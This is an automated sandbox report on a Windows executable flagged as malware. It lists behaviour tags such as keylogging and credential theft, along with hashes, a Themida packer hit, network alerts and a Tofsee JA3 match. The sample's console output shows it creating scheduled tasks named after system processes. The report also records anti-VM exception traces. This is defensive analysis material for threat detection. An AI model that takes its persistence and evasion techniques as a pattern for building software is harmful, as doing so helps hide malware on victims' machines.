Summary | ZeroBOX

Desktop.exe

Downloader, HTTP, ScreenShot, Create Service, KeyLogger, Internet API, P2P, DGA, Http API, Anti_VM, FTP, Socket, Escalate privileges, DNS, Code injection, Sniff Audio, Steal credential, AntiDebug, .NET EXE, PE File, AntiVM, PE32
Category FILE
Machine s1_win7_x6402
Started July 30, 2021, 10:28 a.m.
Completed July 30, 2021, 10:32 a.m.
Size 3.6MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 f31199c1fccb1fe693824f89573e4194
SHA256 3ab850d582976fd9c1bb14c1c50cffa66e9fd6e55fc27a704f01c45d1bc251dc
CRC32 271BA116
ssdeep 98304:GUFI1/p+td2Uf1u1xBKlhVr+4k0fBtkAV8JqhBnO/EuYVKPFswc:D6Uf1u1HKnVrTNBtkbqC8FKKwc
Yara
  • IsPE32 - (no description)
  • anti_vm_detect - Possibly employs anti-virtualization techniques
  • Is_DotNET_EXE - (no description)
  • themida_packer - themida packer
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
ipinfo.io 34.117.59.81
IP Address Status Action
164.124.101.2 Active Moloch
34.117.59.81 Active Moloch
62.109.1.30 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49177 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.102:49177 -> 34.117.59.81:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)
TCP 34.117.59.81:443 -> 192.168.56.102:49177 2025330 ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) Device Retrieving External IP Address Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.102:49177 -> 34.117.59.81:443
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1D4
Subject: CN=ipinfo.io
Fingerprint: 2a:93:c5:f6:21:4b:14:40:41:d9:36:fe:ff:fe:65:37:17:1c:4e:b8

Time & API Arguments Status Return Repeated

GetComputerNameW (24 identical calls)

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent (4 identical calls)

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "conhost" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "IMEDICTUPDATE" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "csrss" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "winlogon" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "lsm" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "taskhost" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The batch file cannot be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: Active code page: 65001
console_handle: 0x00000013
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section
section .imports
section .themida
section .boot
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
desktop+0x5c6530 @ 0x1676530
desktop+0x453ad4 @ 0x1503ad4

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 c8 f9 96 8c 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc000008e
exception.offset: 46887
exception.address: 0x748ab727
registers.esp: 3997276
registers.edi: 18702336
registers.eax: 3997276
registers.ebp: 3997356
registers.edx: 4294826996
registers.ebx: 0
registers.esi: 1998418987
registers.ecx: 3273785344
1 0 0

__exception__

stacktrace:

exception.instruction_r: ed e9 58 7a 01 00 c3 e9 fe 84 03 00 99 ae e5 3c
exception.symbol: desktop+0x5c3a78
exception.instruction: in eax, dx
exception.module: Desktop.exe
exception.exception_code: 0xc0000096
exception.offset: 6044280
exception.address: 0x1673a78
registers.esp: 3997396
registers.edi: 20920013
registers.eax: 1750617430
registers.ebp: 18702336
registers.edx: 22614
registers.ebx: 2147483650
registers.esi: 20575618
registers.ecx: 20
1 0 0

__exception__

stacktrace:

exception.instruction_r: ed e9 ae 84 02 00 77 00 a6 31 d6 b4 fd ff 50 00
exception.symbol: desktop+0x5d2814
exception.instruction: in eax, dx
exception.module: Desktop.exe
exception.exception_code: 0xc0000096
exception.offset: 6105108
exception.address: 0x1682814
registers.esp: 3997396
registers.edi: 20920013
registers.eax: 1447909480
registers.ebp: 18702336
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 20575618
registers.ecx: 10
1 0 0

__exception__

stacktrace:
lsm+0x5c6530 @ 0x15e6530
lsm+0x453ad4 @ 0x1473ad4

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc e9 c8 f9 8d 8c 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc000008e
exception.offset: 46887
exception.address: 0x748ab727
registers.esp: 2357164
registers.edi: 18112512
registers.eax: 2357164
registers.ebp: 2357244
registers.edx: 4294826996
registers.ebx: 0
registers.esi: 1998418987
registers.ecx: 229113856
1 0 0

__exception__

stacktrace:

exception.instruction_r: ed e9 58 7a 01 00 c3 e9 fe 84 03 00 99 ae e5 3c
exception.symbol: lsm+0x5c3a78
exception.instruction: in eax, dx
exception.module: lsm.exe
exception.exception_code: 0xc0000096
exception.offset: 6044280
exception.address: 0x15e3a78
registers.esp: 2357284
registers.edi: 20330189
registers.eax: 1750617430
registers.ebp: 18112512
registers.edx: 22614
registers.ebx: 2147483650
registers.esi: 19985794
registers.ecx: 20
1 0 0

__exception__

stacktrace:

exception.instruction_r: ed e9 ae 84 02 00 77 00 a6 31 d6 b4 fd ff 50 00
exception.symbol: lsm+0x5d2814
exception.instruction: in eax, dx
exception.module: lsm.exe
exception.exception_code: 0xc0000096
exception.offset: 6105108
exception.address: 0x15f2814
registers.esp: 2357284
registers.edi: 20330189
registers.eax: 1447909480
registers.ebp: 18112512
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 19985794
registers.ecx: 10
1 0 0

__exception__

stacktrace:
0x6c23498
0x6c233f1
0x59cd2cf
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124251664
registers.edi: 124251784
registers.eax: 0
registers.ebp: 124251676
registers.edx: 51843304
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c2352a
0x6c233f1
0x59cd2cf
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124247248
registers.edi: 124251784
registers.eax: 0
registers.ebp: 124247260
registers.edx: 51843988
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c236f6
0x6c23651
0x59cd326
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124251664
registers.edi: 124251784
registers.eax: 0
registers.ebp: 124251676
registers.edx: 51844592
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c23786
0x6c23651
0x59cd326
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124247248
registers.edi: 124251784
registers.eax: 0
registers.ebp: 124247260
registers.edx: 51845136
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c238b6
0x6c23811
0x59cd37d
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124251664
registers.edi: 124251784
registers.eax: 0
registers.ebp: 124251676
registers.edx: 51845740
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c23946
0x6c23811
0x59cd37d
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124247248
registers.edi: 124251784
registers.eax: 0
registers.ebp: 124247260
registers.edx: 51846292
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c238b6
0x6c23d50
0x6c23a47
0x6c239d1
0x59cd3d1
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124251492
registers.edi: 124251612
registers.eax: 0
registers.ebp: 124251504
registers.edx: 51846908
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c23946
0x6c23d50
0x6c23a47
0x6c239d1
0x59cd3d1
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124247072
registers.edi: 124251612
registers.eax: 0
registers.ebp: 124247084
registers.edx: 51847460
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c23498
0x6c23d90
0x6c23a56
0x6c239d1
0x59cd3d1
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124251492
registers.edi: 124251612
registers.eax: 0
registers.ebp: 124251504
registers.edx: 51848040
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c2352a
0x6c23d90
0x6c23a56
0x6c239d1
0x59cd3d1
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77199ea5

exception.instruction_r: 39 09 e8 29 d5 58 6a 89 45 f4 8b 45 f4 8b e5 5d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x6c23608
registers.esp: 124247072
registers.edi: 124251612
registers.eax: 0
registers.ebp: 124247084
registers.edx: 51848584
registers.ebx: 49440004
registers.esi: 51570296
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6c23498
0x6c23d90
0x6c23ed6
0x6c23e61
0x59cd425
mscorlib+0x30c9ff @ 0x7124c9ff
mscorlib+0x302367 @ 0x71242367
mscorlib+0x3022a6 @ 0x712422a6
mscorlib+0x302261 @ 0x71242261
mscorlib+0x30ca7c @ 0x7124ca7c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73a22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73a3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73a32e95
DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73ac07d8
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73a97d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73a97dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73a97e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73a2c3bf
DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73ac0694
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73b3a0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x750733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77199ed2
